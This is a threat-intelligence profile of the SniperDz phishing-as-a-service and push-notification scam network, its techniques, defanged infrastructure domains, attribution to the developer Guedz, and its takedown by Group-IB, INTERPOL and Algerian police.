SniperDz

SniperDZ is a long-running phishing-as-a-service (PhaaS) and push-notification-as-a-service (PNaaS) affiliate ecosystem identified by Group-IB and later dismantled in a joint operation involving Group-IB, INTERPOL, and the Algerian National Police. According to the provided reporting, the network was launched in 2015, operated for nearly ten years, and frequently changed names to evade detection. Known aliases mentioned in the content are JokerDz, StormDz, and SpamDz. The platform provided centralized, turnkey phishing infrastructure and approximately 80 ready-made phishing templates, including multilingual templates targeting around 30 major online platforms such as PayPal, Facebook, Instagram, Netflix, and Steam. Group-IB also reported that the ecosystem hosted more than 50 phishing templates impersonating over 70 globally recognized brands across financial services, social media, streaming, and gaming. The operation used more than 20,000 domains to host fake login pages and enabled even low-skill affiliates to steal usernames, passwords, and other personal data at scale. The activity described in the content was concentrated particularly across the Middle East and North Africa. Campaigns used fraudulent Facebook and Instagram accounts impersonating politicians, public figures, and telecom providers, including Algérie Télécom, to lure victims with fake offers such as free mobile internet packages, gifts, financial compensation, and government subsidy programs. Victims were routed through trusted link-aggregation services including Linkbio and Linktree, then through attacker-controlled redirect and tracking infrastructure. The ecosystem also operated as a browser push-notification monetization platform. Victims were presented with pages prompting them to click "Allow" to continue, after which the infrastructure registered browser push subscriptions using a recurring VAPID public key observed across samples. Subscription tokens and metadata were sent back to operator-controlled servers, and victims were subsequently monetized through unsolicited advertisements, scam promotions, and malicious content delivered via browser push notifications even after the original page was closed. Techniques explicitly described in the content include multi-stage redirect chains, cloaking to present benign error pages to researchers and scanners, browser history manipulation that inserted fake entries to create a back-button prison, and tab-under redirection. Infrastructure links cited in the content include shared hosting on Horizon IS and domains such as win.feezossl[.]xyz, win.anababayala[.]com, aff.bnaoswhye[.]shop, and raviral[.]com. The content attributes development of the platform to an online actor known as Guedz. Group-IB and INTERPOL reportedly identified Guedz through tutorial videos that exposed an administrator panel and backend email addresses; Algerian authorities subsequently arrested him and seized hardware containing phishing code and malicious scripts. The takedown was conducted as part of INTERPOL's Operation Ramz.